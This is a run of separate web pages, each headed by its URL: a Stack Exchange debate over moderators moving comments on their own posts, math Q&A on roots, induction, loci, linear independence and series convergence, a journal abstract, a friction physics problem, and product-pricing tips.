One thing we aren't very good at as a community on Aviation is cleaning up comment threads and getting the good stuff from them edited into the associated posts. Comments on a Stack are meant to be ephemeral entities anyway -- if a comment thread isn't currently being useful, it probably should be cleaned up and its associated post edited to reflect what the comments unearthed.
• Yes, we're not very good at it and it should be edited in. It doesn't answer the question though. Nov 21, 2017 at 9:54
• That may be true for the general case, but in cases where there's a difference of opinion (e.g. when fooot said "I'm not convinced the points from the Goodyear manual necessarily apply."), who's to decide what's valuable/useful? That's exactly what the conflict of interest here is about: if the answerer is a moderator, he can remove helpful comments because he wrongfully doesn't consider them valuable. Nov 29, 2017 at 15:48
• I generally agree, but I want to make one exception. Comments with a good joke, or a well-received light hearted remark (as indicated by the many upvotes) are valuable to the site so they should not be deleted nor be edited in.
– DeltaLima Mod
Nov 30, 2017 at 17:39
It appears that way, but it is not.
When a post (question or answer) has 20 or more comments, a flag is automatically raised for mods to delete the comments. So far I have never seen a mod delete those comments without moving them to a chat room. So the critique is in the chat, not under a post. This way, if someone is interested in reading the discussion further, it is in chat, which is public too.
Ironically, it happened twice that both you and that mod answered a question and he happened to clean up the comments because of a flag.
You should not expect [comments] to be around forever
As I mentioned in my (now deleted) comment, you did the right thing by providing an answer. This is the positive response if or when you feel that another answer is not 100% correct.
• It appears that way, but it is not. You then explain that there is a procedure and an automatic flag, which have existed for a long time and were used sparingly and with care, which I reckon is good judgement. This is the first time I can see an action & comment from yourself, and the communication is well phrased and moderate in tone. A moderator - what's in a name? Nov 23, 2017 at 2:21
• IMO this glosses over the real issues here: comments may be ephemeral, but moderators have the power to make them more short-lived. Your answer is like saying it's ok that they're moving comments to a separate page because they were already less prominent. Additionally, if there's a flag, doesn't that make it easier, not harder, to get a different mod to clean up the comments? Nov 29, 2017 at 15:57
My opinion is a short one. Comments are for clarification and are ephemeral. Period. Anyone can flag one, and any moderator is expected to clean things up.
If an answer is wrong, in your opinion, the proper way to deal with it is to vote down the answer. A comment is not necessary. If you do leave one (and I try to every time), well, if the comment disappears, so be it. You've still voted on the answer.
In the Stack Exchange model, there might be 5 answers, 4 of which are correct and valid, and a fifth which supports the questioner's belief. That one may be selected as the accepted answer, and there is not much we can do, except to down vote. Please use the tools that are given, in the way they are meant to be. If you need to discuss a question, or an answer, that is what aviation chat is for.
• It does not answer the question. I reckon that comments are more valuable than chatrooms, as also indicated by the pop-up window that appears when you hover over the up-vote triangle left of the comment: This comment adds something useful to the post. But my main point is a potential conflict of interest. The rest of us cannot remove critical comments. Nov 24, 2017 at 14:49
I think yes, there is a potential conflict of interest, although in most cases the comments are going to be moved anyway, no matter who does it. Most of the other answers ignore the realities of how Stack Exchange works in practice. In reality, comments are much longer-lived and more visible than chat rooms, many constructive comments are never incorporated, and other moderators' oversight and voting don't fairly resolve many disputes about answer details.
My recommendation is twofold:
1. To avoid the appearance of impropriety, moderators should avoid moving comments on their own posts, especially when they disagree with some of the comments.
2. I'd recommend that comment authors and moderators try more openly to get comments worked into the answer, rather than letting them die in comments or especially chat.
Every time there are more than 20 comments in 3 days, a flag appears suggesting the moderators move the comments to chat. The mod who moves the comments doesn't have to be the answerer. All mods see the flag, don't they? In practice it seems moderators almost always move every single comment to chat, although officially, moderators "should only move comments to chat when there appears to be an ongoing constructive discussion involving two or more individuals that has lost its direct relevance to the post." (source)
High visibility of other moderators' behavior is just a mitigating factor. In truth, that's usually how moderators are kept honest across their many chances to abuse their privileges. However, this just means the issue isn't a big deal, not that there's any advantage or disadvantage to having moderators avoid moving comments on their own answers.
Yes, this does have the effect of downplaying the important comments. The viewer now has to consciously decide he wants to see the comments (how often do you decide this yourself?). It's harder in a chat to see which comments were highly upvoted feedback and which are pointless conversation. Additionally, the chat room may be deleted just because it's "inactive", unlike comments.
Comments may not be permanent, but is it right for moderators in this situation to make them even more short-lived? Saying this is ok because comments are short lived rests on the assumption that comments in chat rooms are, for this purpose, basically as long-lived as comments should be. That doesn't sound right. In reality, a dissenting comment will stick around for years, while a chat room will likely be deleted in a few months.
Valuable comments should technically be added to the answer. In truth this often happens, as it did for the first question you linked about instability during landings. However, in practice this often doesn't happen, especially if the answerer disagrees about how "valuable" the comment is, providing a potential conflict of interest. The usual recourse here is to post a separate dissenting answer, which hopefully will get noticed by new visitors to the question and upvoted.
What are some recourses?
• Create a separate answer if you disagree with the post and your comments aren't being incorporated
• If you see a good comment, try to tactfully suggest an edit to the answer. Answers are often abandoned by their users despite having important comments pending.
• If you, as a moderator, commenter, or viewer, see a valuable and succinct comment in a chat room that has gone unaddressed after several days, add it as a tactful edit to the answer or re-add it as a comment. Do not do this for the back-and-forth comments that caused the move to chat in the first place.
https://math.stackexchange.com/questions/2567104/roots-of-a-function-between-two-roots-of-another-function
# Roots of a function between two roots of another function
I've been asked the following problem:
Let $f$ and $g$ be two functions differentiable in the interval $I$. Prove that if $$f(x)g'(x) - f'(x)g(x) \ne 0 \quad \forall x \in I$$ then there is one root of $g$ between every two roots of $f$.
Now, the problem is, this question was asked in German, and the word for 'one' and the word for 'a' are both the same in German. In other words, I do not know if the sentence means exactly one root of $g$ or at least one root of $g$. I've already spent a few hours on this problem and managed to show that there is at least one root of $g$ between two roots of $f$:
$$f(x)g'(x) - f'(x)g(x) = c, \quad c \ne 0$$ $$\Leftrightarrow g(x) = \frac{f(x)g'(x) - c}{f'(x)}$$ $$x_1, x_2 \in I, \quad f(x_1) = 0, \quad f(x_2) = 0$$ $$g(x_1) = \frac{f(x_1)g'(x_1) - c}{f'(x_1)} = -\frac{c}{f'(x_1)}$$ $$g(x_2) = \frac{f(x_2)g'(x_2) - c}{f'(x_2)} = -\frac{c}{f'(x_2)}$$ Next, we can say: if $g(x_1)$ and $g(x_2)$ have different signs, there exists a $\xi$ for which $g(\xi) = 0$ (IVT).
$g(x_1)$ and $g(x_2)$ have different signs if and only if $f'(x_1)$ and $f'(x_2)$ have different signs. Using Rolle's Theorem we can say:
There is an $\eta \in (x_1, x_2) : f'(\eta) = 0$
As $x_1 < \eta < x_2$, we can say that either $f'(x_1)$ is negative and $f'(x_2)$ is positive, or vice versa. Therefore the signs of $g(x_1)$ and $g(x_2)$ are different as well, and we know that there must be at least one root in the interval.
However, I just do not manage to create a proof that shows that there can't be more than 1 root in the interval. My guess would have been using Rolle's Theorem for a proof by contradiction; however, there might well be an extremum in the interval, since $g(x)$ might have other roots outside the bounds of the interval. (Or did I get something wrong here?)
So my question is:
Is the initial statement true, and if it is, how can I prove it?
• I believe the German statement asked for "a root". I'm a Spanish native speaker and the same ambiguity would have happened in Spanish; in this language the convention in maths is that if there's no precision "un/una" means "a/an", that is "at least one". – Alejandro Nasif Salum Dec 14 '17 at 22:54
• Also, the uniqueness comes from the fact that the statement is symmetric in $f$ and $g$, so under those conditions you proved that there is "at least one" root of $g$ between two given roots of $f$, but you've also proved that there is "at least one" root of $f$ between two given roots of $g$. If you add the precision "consecutive" roots, then this implies uniqueness. On the other hand, between non-consecutive roots of, say, $f$ there can be more than one root of $g$; precisely one more than the number of roots $f$ you have left in between. – Alejandro Nasif Salum Dec 14 '17 at 22:58
• This does not address your main concern, but the proof itself might be simplified by observing that under the assumption that $g$ has no roots, $f'(x)g(x)-f(x)g'(x)$ is just $g^2(x)$ times the derivative of $\frac{f(x)}{g(x)}$, and Rolle says that this must be zero somewhere in-between. – Hagen von Eitzen Dec 14 '17 at 23:01
• Just to be sure: Does this mean I can say: Assume $g(x)$ has no roots. Let $h(x) = \frac{f(x)}{g(x)}$. Then $h(x_1) = h(x_2) = 0$ because $f(x_1) = f(x_2) = 0$. Because of Rolle this means that $h'(\xi) = 0$, therefore $f'(\xi)g(\xi) - f(\xi)g'(\xi)$ must be $0$ as well, which contradicts the statement. Because of that, $g(x)$ must have roots. – zockDoc Dec 14 '17 at 23:21
The uniqueness comes from the fact that the statement is symmetric in $f$ and $g$, so under those conditions you proved that there is "at least one" root of $g$ between two given roots of $f$, but you've also proved that there is "at least one" root of $f$ between two given roots of $g$. If you add the precision "consecutive" roots, then this implies uniqueness.
On the other hand, between non-consecutive roots of, say, $f$ there can be more than one root of $g$; precisely one more than the number of roots $f$ you have left in between.
Anyway, I would say your proof works fine only under the hypothesis of consecutive roots. If you allow $f$ to be $0$ in the interval $(x_1,x_2)$, then I do not see how you could conclude that $f'(x_1)$ and $f'(x_2)$ have different signs. Think for instance of $f(x)=x^3-x$ in the interval $[-1,1]$, where Rolle's conditions are met, but $f'(-1)=f'(1)=2$.
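A standard concrete illustration of the statement: take $f(x)=\sin x$ and $g(x)=\cos x$. Then $f(x)g'(x)-f'(x)g(x) = -\sin^2 x - \cos^2 x = -1 \ne 0$ for all $x$, and between any two consecutive roots $k\pi$ and $(k+1)\pi$ of $f$ there is exactly one root of $g$, namely $k\pi + \pi/2$.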
https://cronfa.swan.ac.uk/Record/cronfa50766
Journal article
Sheffer homeomorphisms of spaces of entire functions in infinite dimensional analysis, by Dmitri Finkelshtein, Yuri Kondratiev, Eugene Lytvynov, Maria João Oliveira, Ludwig Streit
Journal of Mathematical Analysis and Applications, Volume: 479, Issue: 1, Pages: 162 - 184
Released under the terms of a Creative Commons Attribution Non-Commercial No Derivatives License (CC-BY-NC-ND).
DOI (Published version): 10.1016/j.jmaa.2019.06.021
Abstract
For certain Sheffer sequences $(s_n)_{n=0}^\infty$ on $\mathbb C$, Grabiner (1988) proved that, for each $\alpha\in[0,1]$, the corresponding Sheffer operator $z^n\mapsto s_n(z)$ extends to a linear self-homeomorphism of $\mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$, the Fréchet topological space of entire functions of order at most $\alpha$ and minimal type (when the order is equal to $\alpha>0$). In particular, every function $f\in \mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$ admits a unique decomposition $f(z)=\sum_{n=0}^\infty c_n s_n(z)$, and the series converges in the topology of $\mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$. Within the context of a complex nuclear space $\Phi$ and its dual space $\Phi'$, in this work we generalize Grabiner's result to the case of Sheffer operators corresponding to Sheffer sequences on $\Phi'$. In particular, for $\Phi=\Phi'=\mathbb C^n$ with $n\ge2$, we obtain the multivariate extension of Grabiner's theorem. Furthermore, for an Appell sequence on a general co-nuclear space $\Phi'$, we find a sufficient condition for the corresponding Sheffer operator to extend to a linear self-homeomorphism of $\mathcal E^{\alpha}_{\mathrm{min}}(\Phi')$ when $\alpha>1$. The latter result is new even in the one-dimensional case.
Keywords: Infinite dimensional holomorphy; Nuclear and co-nuclear spaces; Sequence of polynomials of binomial type; Sheffer operator; Sheffer sequence; Spaces of entire functions.
Published in: Journal of Mathematical Analysis and Applications, ISSN 0022-247X, Elsevier BV, 2019, Volume 479, Issue 1, Pages 162-184. https://cronfa.swan.ac.uk/Record/cronfa50766
http://math.stackexchange.com/questions/58700/beginner-mathematical-induction-help-understanding-example/58702
Beginner - Mathematical induction - help understanding example?
So:
$$(1+x)^n ≥ 1 + nx$$
So he checks for $n=1$, and gets:
$$1+x ≥ 1+x$$
Next, for variable $k$:
$$(1+x)^k ≥ 1 + kx$$
Then the book wants to prove:
$$(1+x)^{k+1} ≥ 1 + (k + 1)x$$
And here is books proof:
$$(1+x)^{k+1} = (1+x)^k (1+x) ≥ (1+kx)(1+x)$$ $$= 1+(k+1)x + kx^2 ≥ 1 + (k + 1)x$$
Finished! Well... How did the book get this: $(1+kx)(1+x)$ in that last part? Sorry, I'm so confused. Sorry if this is too easy to be here. Thanks for any help in understanding it!
Your question is a great one; it is most welcome here! The answer is that, in a proof by induction, we first check the base case (here, it is $n=1$), and then, assuming the result is true for $n=k$, we prove that the result must also be true for $n=k+1$. In other words, we want to prove that $$\text{true for }n=k\implies\text{true for }n=k+1$$
Intuitively, this lets us say \begin{align} (\text{base case}) \qquad\qquad\qquad\qquad\qquad\qquad&\text{true for }n=1\qquad\checkmark\\ {\text{true for }n=1,\text{ and }\atop (\text{true for }n=k\implies\text{ true for }n=k+1)}\bigg\}\implies&\text{true for }n=2\qquad\checkmark\\ {\text{true for }n=2,\text{ and }\atop (\text{true for }n=k\implies\text{ true for }n=k+1)}\bigg\}\implies&\text{true for }n=3\qquad\checkmark\\ \vdots\end{align}
Thus, when we try to prove that the statement is true for $n=k+1$, i.e. $$(1+x)^{k+1} ≥ 1 + (k + 1)x,$$ we can use the assumption that the statement is true for $n=k$, i.e. $$(1+x)^k ≥ 1 + kx.$$ The reason why we have $$(1+x)^k (1+x) ≥ (1+kx)(1+x)$$ is that we are assuming $$(1+x)^k ≥ 1 + kx$$ is true, and then we multiply both sides by $(1+x)$. (Multiplying an inequality by $(1+x)$ preserves its direction only when $1+x \ge 0$, which is why this statement is usually given with the hypothesis $x \ge -1$.)
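As a concrete instance of the two inequalities (with numbers chosen purely for illustration): taking $k=2$ and $x=1$, the chain reads $$(1+1)^{3} = (1+1)^{2}(1+1) \ge (1+2\cdot 1)(1+1) = 6 \ge 1+3\cdot 1 = 4,$$ and indeed $8 \ge 6 \ge 4$.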
Actually, $n=0$ can be a base case as well :-) – Asaf Karagila Aug 21 '11 at 14:44
In your next to last line, you have $(1+x)^k,$ which you have assumed two lines above is greater than or equal to $1+kx$. So the book made the substitution, using a $\ge$ sign. You might look at this answer, which has a detailed explanation of induction.
http://www.etap.umb.sk/o7fqxqj/equation-of-locus-4b2764
A locus is a set of points which satisfy certain geometric conditions. In maths, a locus is the set of points represented by a particular rule, law, or equation; in most cases, the relationship of these points is defined according to their position in rectangular coordinates. A formal(ish) definition: the equation of a curve is the relation which exists between the coordinates of all points on the curve, and which does not hold for any point not on the curve.
For example, if I write an equation, say x + y = 4, and tell you that this represents a line, it means that if you take any random point lying on this line and add its x-coordinate to its y-coordinate, you'll always get 4 as the sum; and if you take any other point not on the line and add its coordinates together, you'll never get the sum as 4. (For now, don't worry about why x + y = 4 should look like a line, and not something different, e.g. a circle. We'll see that later.)
Here is a step-by-step procedure for finding plane loci:
Step 1: If possible, choose a coordinate system that will make computations and equations as simple as possible.
Step 2: Write the given conditions in a mathematical form involving the coordinates $x$ and $y$.
Step 3: Simplify the resulting equations.
Step 4: Identify the shape cut out by the equations.
Step 1 is often the most important part of the process, since an appropriate choice of coordinates can simplify the work in steps 2-4 immensely.
A point at a fixed distance from a point: it is given that OP = 4, where O is the origin. The equation of the locus under the given conditions is $x^2 + y^2 = 16$, a circle of radius 4 about the origin.
A point at a fixed distance from a line: a point at distance 5 from the X-axis satisfies $y = 5$. There is also another possibility, $y = -5$, a line parallel to the X-axis at a distance of 5 units but lying below the axis.
A point equidistant from two points: let the two fixed points be A(1, 1) and B(2, 4), and P(x, y) be the moving point. The condition PA = PB gives
$$\sqrt{(x-1)^2+(y-1)^2}=\sqrt{(x-2)^2+(y-4)^2}.$$
Squaring both sides and simplifying yields the first-degree equation $x + 3y = 9$; hence the locus of P is a straight line, the perpendicular bisector of AB.
A point with a constant sum of distances: find the locus of all points $P$ in a plane such that the sum of the distances $PA$ and $PB$ is a fixed constant, where $A$ and $B$ are two fixed points in the plane. After translating and rotating, we may assume $A = (-a,0)$ and $B = (a,0)$, and let the constant be $c$. If $c < 2a$ the locus is clearly empty, and if $c = 2a$ it is just the segment $AB$, so assume $c > 2a$. Let $PA = d_1$ and $PB = d_2$, so that $d_1^2+d_2^2 = (x+a)^2+y^2+(x-a)^2+y^2 = 2x^2+2y^2+2a^2$ and $d_1^2-d_2^2 = 4ax$. The locus equation is
$$\begin{aligned}
d_1+d_2 &= c \\
d_1^2+d_2^2+2d_1d_2 &= c^2 \\
4d_1^2d_2^2 &= \big(c^2-d_1^2-d_2^2\big)^2 \\
0 &= c^4-2c^2\big(d_1^2+d_2^2\big)+\big(d_1^2-d_2^2\big)^2 \\
0 &= c^4-2c^2\big(2x^2+2y^2+2a^2\big)+16a^2x^2 \\
\big(4c^2-16a^2\big)x^2+\big(4c^2\big)y^2 &= c^2\big(c^2-4a^2\big).
\end{aligned}$$
Since $4c^2-16a^2>0$ and $c^2-4a^2>0$, this is the equation of an ellipse.
A point with a constant sum of squared distances: with the same $A$ and $B$, suppose instead the constant is $c^2$, $c \ne 0$, and $PA^2 + PB^2 = c^2$. Then
$$\begin{aligned}
(x+a)^2+y^2+(x-a)^2+y^2 &= c^2 \\
2x^2+2y^2+2a^2 &= c^2 \\
x^2+y^2 &= \frac{c^2}{2}-a^2.
\end{aligned}$$
So the locus is either empty (if $c^2 < 2a^2$), a point (if $c^2 = 2a^2$), or a circle (if $c^2 > 2a^2$).
A point equidistant from a point and a line: after rotation and translation (and possibly reflection), we may assume that the point is $(0,2a)$ with $a \ne 0$ and that the line is the $x$-axis. The distance from $(x,y)$ to the $x$-axis is $|y|$, and the distance to the point is $\sqrt{x^2+(y-2a)^2}$, so the equation becomes
$$\begin{aligned}
y^2 &= x^2+(y-2a)^2 \\
0 &= x^2-4ay+4a^2 \\
y &= \frac{x^2}{4a}+a,
\end{aligned}$$
a parabola. Note that if the point did lie on the line, i.e. $a=0$, the equation reduces to $x^2=0$, or $x=0$, which gives a line perpendicular to the original line through the point; this makes sense geometrically as well.
Some further exercises of the same kind: find the locus of points whose distances from two points $A$ and $B$ are always in the ratio $\lambda:1$, where $\lambda$ is a positive real number not equal to 1 (the answer is a circle, the circle of Apollonius); find the locus of the midpoint $P$ of a rod of length $l$ that slides with its ends on the $x$-axis and $y$-axis; and find the set of all points $(x,y)$ such that the product of its distances from the coordinate axes is 4 (answer: $xy = \pm 4$).
Reference: https://brilliant.org/wiki/equation-of-locus/
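The simplification in the perpendicular-bisector example above is easy to check symbolically; a minimal sketch (my own, using SymPy, not part of the original page) is:

```python
from sympy import symbols, Eq, expand

x, y = symbols("x y", real=True)

# Squared distances from P(x, y) to A(1, 1) and B(2, 4); equating them
# is equivalent to equating the distances themselves, and avoids square roots.
d2_A = (x - 1) ** 2 + (y - 1) ** 2
d2_B = (x - 2) ** 2 + (y - 4) ** 2

locus = Eq(expand(d2_A - d2_B), 0)
print(locus)  # Eq(2*x + 6*y - 18, 0), i.e. x + 3y = 9
```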
https://www.physicsforums.com/threads/linear-algebra-proof-involving-linear-independence.834740/
# Linear Algebra Proof involving Linear Independence
## Homework Statement
Prove that if $({A_1, A_2, ..., A_k})$ is a linearly independent subset of M_nxn(F), then $(A_1^T,A_2^T,...,A_k^T)$ is also linearly independent.
## The Attempt at a Solution
Have: $a_1A_1^T+a_2A_2^T+...+a_kA_k^T=0$ implies $a_1A_1+a_2A_2+...+a_kA_k=0$
So $a_1=a_2=a_3=\dots=a_k=0$
^^ This was the answer in the back of the book, but I'm not sure what it means.
I guess I have to assume that the T means transpose here. It's safe to assume that since it's linearly independent, then the transpose is also linearly independent?
##A_i## denotes an n x n matrix, as I understand it, and the said system is a subset of ##Mat_n (F)##.
Only trivial linear combination of the matrices ##A_i## produces a 0 matrix.
EDIT: I think that was too much information. In general, what can you say about the individual sums of the elements with respective indices given that the initial system is linearly independent?
Mark44
Mentor
There is a subtlety in the definition of linear independence that escapes many students in linear algebra. Given any set of vectors ##{v_1, v_2, \dots, v_n}##, the equation ##c_1v_1 + c_2v_2 + \dots + c_nv_n = 0## always has ##c_1 = c_2 = \dots = c_n = 0## as a solution. The difference between the vectors being linearly independent versus linearly dependent is whether the solution for the constants ##c_i## is unique. For a set of linearly independent vectors, ##c_1 = c_2 = \dots = c_n = 0## is the only solution (often called the trivial solution). For a set of linearly dependent vectors, there will also be an infinite number of other solutions.
Here's an example. Consider the vectors ##v_1 = <1, 0>, v_2 = <0, 1>, v_3 = <1, 1>##. The equation ##c_1v_1 + c_2v_2 + c_3v_3 = 0## is obviously true when ##c_1 = c_2 = c_3 = 0##. That alone isn't enough for us to conclude that the three vectors are linearly independent. With a bit of work we can see that ##c_1 = 1, c_2 = 1, c_3 = -1## is another solution. In fact, this is only one of an infinite number of alternative solutions, so we conclude that the three vectors here are linearly dependent.
What I've written about vectors here applies to any member of a vector space, including the matrices of the problem posted in this thread.
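A quick numeric way to see that example (a sketch of mine, not from the thread; it assumes NumPy and SciPy are available): the coefficient triples (c1, c2, c3) with c1*v1 + c2*v2 + c3*v3 = 0 form the null space of the matrix whose columns are the vectors.

```python
import numpy as np
from scipy.linalg import null_space

# Mark44's example: v1 = <1, 0>, v2 = <0, 1>, v3 = <1, 1>,
# stacked as the columns of a 2 x 3 matrix.
V = np.array([[1, 0, 1],
              [0, 1, 1]])

print(null_space(V))
# Nontrivial: spanned by a multiple of (1, 1, -1), so the vectors are
# linearly dependent, matching c1 = 1, c2 = 1, c3 = -1 in the post.
```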
RJLiberator said:
^^ This was the answer in the back of the book, but I'm not sure what it means.
I guess I have to assume that the T means transpose here. It's safe to assume that since it's linearly independent, then the transpose is also linearly independent?
Yes, T means transpose. No, you can't assume that since the set of vectors (matrices in this case) is linearly independent, then the set of transposes is also linearly independent. You have to show that this is the case.
You gave 3 vectors in your example in a two-dimensional space. There is always one vector that is a linear combination of the two others, provided the set of vectors spans the space.
The objective in the problem is to use the fact that the system of matrices is linearly independent. It means that the linear combination to produce a 0 matrix is trivial.
Multiplying a matrix with a scalar, however, means each individual element of the matrix is multiplied with the same scalar.
Fredrik
Staff Emeritus
Gold Member
When you're asked to prove that a set ##\{v_1,\dots,v_n\}## is linearly independent, you should almost always start the proof with "Let ##a_1,\dots,a_n## be numbers such that ##\sum_{i=1}^n a_i v_i=0##."
This is the straightforward way to begin because the definition of "linearly independent" tells you that now it's sufficient to prove that ##a_i=0## for all ##i\in\{1,\dots,n\}##. Use the equality ##\sum_{i=1}^n a_iv_i=0## and the assumptions that were included in the problem statement.
So in your case, you start by saying this: Let ##a_1,\dots,a_k\in\mathbb F## be such that ##\sum_{i=1}^k a_i (A_i)^T=0##.
Then you use the assumptions to prove that this equality implies that ##a_i=0## for all ##i\in\{1,\dots,k\}##.
It's safe to assume that since it's linearly independent, then the transpose is also linearly independent?
I don't know what you mean exactly, but you can't assume anything that wasn't included as an assumption in the problem statement. If you mean that it's safe to assume that since ##\{A_1,\dots,A_k\}## is linearly independent, ##\{(A_1)^T,\dots,(A_k)^T\}## is too, then the answer is an extra strong "no", because you have made the statement that you want to prove one of your assumptions.
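Carried through for this problem, that outline becomes a complete proof (a sketch along the lines described above): let ##a_1,\dots,a_k\in\mathbb F## be such that ##\sum_{i=1}^k a_i (A_i)^T=0##. Taking the transpose of both sides, and using that transposition is linear and that ##\left((A_i)^T\right)^T=A_i##, gives ##\sum_{i=1}^k a_i A_i=0##. By the assumed linear independence of ##\{A_1,\dots,A_k\}##, it follows that ##a_1=\dots=a_k=0##, which is exactly what was needed.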
Mark44
Mentor
nuuskur said:
You gave 3 vectors in your example in a two-dimensional space. There is always one vector that is a linear combination of the two others, provided the set of vectors spans the space.
I did this on purpose, to provide a simple example of a set of linearly dependent vectors. To show that this set was linearly dependent, I used only the definition of linear dependence. Of course you could use other concepts to show that there are too many vectors in my set to form a basis, which makes the set linearly dependent, but my point was that many beginning students of Linear Algebra don't get the fine point that distinguishes linear independence from linear dependence; namely, the business about the equation having only the trivial solution.
nuuskur said:
The objective in the problem is to use the fact that the system of matrices is linearly independent. It means that the linear combination to produce a 0 matrix is trivial.
Multiplying a matrix with a scalar, however, means each individual element of the matrix is multiplied with the same scalar.
Ray Vickson
Homework Helper
Dearly Missed
Are you sure you have copied the question correctly? As stated, it is essentially trivial. A more important---and not nearly as easy---version would be: if the columns of an ##n \times n## matrix are linearly independent, then the rows are linearly independent as well. (Your version of the problem is that if a bunch of ##n \times n## matrices are linearly independent, then so are their transposes. That seems a pointless exercise to me!)
Yeah, the question is pretty trivial after reading the responses here. I suppose that's why I was a bit mixed up on it. I felt I didn't have enough for the answer.
But after reading the discussion here and adding a few things, I feel confident with this.
Thanks, and a shout out to Fredrik for the extreme clarity.
https://plainmath.net/48314/use-the-comparison-or-limit-comparison-test-to-decide-if-the
# Use the comparison or limit comparison test to decide if the
Use the comparison or limit comparison test to decide if the following series converge.
$\sum _{n=1}^{\mathrm{\infty }}\frac{4-\mathrm{sin}n}{{n}^{2}+1}$
For each series which converges, give an approximation of its sum, together with an error estimate, as follows. First calculate the sum ${s}_{5}$ of the first 5 terms, then estimate the "tail" $\sum _{n=6}^{\mathrm{\infty }}{a}_{n}$ by comparing it with an appropriate improper integral or geometric series.
Timothy Wolff
Given series is $\sum _{n=1}^{\mathrm{\infty }}\frac{4-\mathrm{sin}n}{{n}^{2}+1}$
Since $0<\frac{4-\sin n}{n^2+1}<\frac{5}{n^2}$ (the minimum value of $\sin n$ is $-1$, so $4-\sin n\le 5$, while $n^2+1>n^2$)
And $\sum_{n=1}^{\infty}\frac{5}{n^2}$ is convergent (a constant multiple of the convergent $p$-series with $p=2$)
Since $\sum_{n=1}^{\infty}\frac{4-\sin n}{n^2+1}<\sum_{n=1}^{\infty}\frac{5}{n^2}$ and $\sum_{n=1}^{\infty}\frac{5}{n^2}$ is convergent
By the comparison test, $\sum_{n=1}^{\infty}\frac{4-\sin n}{n^2+1}$ is convergent
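Neither answer carries out the numeric estimate the question asks for. A minimal sketch of that computation (my own, using the $5/n^2$ bound above and the integral estimate $\sum_{n=6}^{\infty}\frac{5}{n^2}\le\int_{5}^{\infty}\frac{5}{x^2}\,dx=1$ for the tail):

```python
import math

# Partial sum s_5 of the first five terms of sum_{n>=1} (4 - sin n) / (n^2 + 1).
s5 = sum((4 - math.sin(n)) / (n ** 2 + 1) for n in range(1, 6))

# Tail bound: for n >= 6, (4 - sin n)/(n^2 + 1) <= 5/n^2, and
# sum_{n=6}^{inf} 5/n^2 <= integral_{5}^{inf} 5/x^2 dx = 1.
tail_bound = 1.0

print(f"s_5 = {s5:.4f}, tail <= {tail_bound}")
```

So the sum lies between $s_5$ and $s_5 + 1$; sharper tail estimates are possible, but this already answers the question as posed.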
psor32
Use the limit test to determine the convergence of the series:
$\sum _{n}^{\mathrm{\infty }}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}$
Recall the statement of the limit test.
Only the divergence of a series $\sum _{n}^{\mathrm{\infty }}{a}_{n}$ can be established this way, by examining the quantity $\rho =\underset{n\to \mathrm{\infty }}{lim}{a}_{n}$ and using the following comparisons:
If $|\rho |>0$ or if ρ is undefined, the series diverges.
If $\rho =0$, the limit test is inconclusive.
Check the divergence of the series by computing the limit of the summand.
Take the limit of the summand as n approaches $\mathrm{\infty }$:
$\underset{n\to \mathrm{\infty }}{lim}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}=0$
INTERMEDIATE STEPS:
Find the following limit:
$\underset{n\to \mathrm{\infty }}{lim}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}$
A bounded function times one that approaches 0 also approaches 0.
Since $3\le 4-\mathrm{sin}\left(n\right)\le 5$ for all n, and since $\underset{n\to \mathrm{\infty }}{lim}\frac{1}{{n}^{2}+1}=0$, we have that $\underset{n\to \mathrm{\infty }}{lim}\frac{4-\mathrm{sin}\left(n\right)}{{n}^{2}+1}=0:$
If the limit of the summand as the iterator n goes to $\mathrm{\infty }$ is nonzero, then the series must diverge.
Since the limit is equal to 0, the limit test is inconclusive:
Answer: The limit test is inconclusive.
https://socratic.org/questions/5920b16711ef6b13eaeccda2
# Question #ccda2
May 20, 2017
I tried this:
#### Explanation:
We can use Newton's Second Law and write:
$F = m a$
and from Kinematics:
$a = \frac{{v}_{f} - {v}_{i}}{t}$
or in numbers:
$F = 1200 \cdot \frac{27.78 - 0}{12} = 2778 N$
Friction opposes the motion, so you need more applied force to achieve the same acceleration.
So in our case the engine must supply an extra:
$3000 - 2778 = 222 N$ to overcome friction; the friction force is therefore exactly
$222 N$
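The same arithmetic can be checked in a few lines of Python (our sketch, using the numbers quoted above: mass 1200 kg, final speed 27.78 m/s, time 12 s, applied force 3000 N):

m, v_f, v_i, t = 1200.0, 27.78, 0.0, 12.0  # kg, m/s, m/s, s
F_applied = 3000.0                          # N, force the engine provides

a = (v_f - v_i) / t           # kinematics: constant acceleration
F_net = m * a                 # Newton's second law
friction = F_applied - F_net  # extra force spent overcoming friction

print(f"F_net = {F_net:.0f} N, friction = {friction:.0f} N")  # 2778 N, 222 N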
## how to calculate selling price of a product
You simply get the total of all costs of producing one unit of your product or service, then add the money you would like to make from each sale (your desired profit). This cost-plus approach is the most common and easiest way to price a product, and it applies directly to a manufacturing business.

In any conversation about product pricing, you'll be asked about two terms: markup and profit margin. Markup expresses the profit as a percentage of the cost; margin expresses it as a percentage of the selling price. For example, a selling price of $166.67 minus its cost of $100.00 equals a gross profit of $66.67: a 40% margin, but a 66.7% markup. Target profit or return can be set to a profit in dollars, a margin percentage, or a markup percentage.

Two formulas come up repeatedly:

Direct costs margin % = direct costs margin / sales price x 100%

Add all of your costs together and divide by volume to produce a unit break-even figure. Whereas product cost is the sum of all the expenses surrounding the production of your goods, product cost per unit is the cost of producing a single product.

To hit a 40% margin on a good that costs $45, divide $45 by 0.6 (that is, by 1 minus the margin) to set the price of $75. Likewise, if a cost of £4.50 is to be 25% of the selling price, then £4.50 / 25 x 100 = £18.00, the selling price.

The price can vary depending on how much buyers are willing to pay, how much the seller is willing to accept, and how competitive the price is in comparison to other businesses in the market. Like it or not, customers infer a lot of information about your business from your prices, and buyers respond to psychological thresholds. This is the reason a retailer is more likely to price a product at $19.99 rather than $20.00. And if your pricing strategy and your competitor's pricing strategy are the same, it's like missing out on a useful tool.
If you have dreams of selling your product in stores, all of this pricing has to be taken into account. The simplest formula for pricing your products is:

WHOLESALE PRICE = (Labor + Materials) x 2 to 2.5

The x2 to x2.5 multiplier takes your profit and overhead into account as well, so you're covered. In the same spirit, you can total your costs and apply a markup percentage: with total costs of $38 and the retail-industry-standard 50% markup, the final product price is $57.00 ($38 x 1.50).

The general relationship is:

Selling Price = Cost Price + Profit Margin

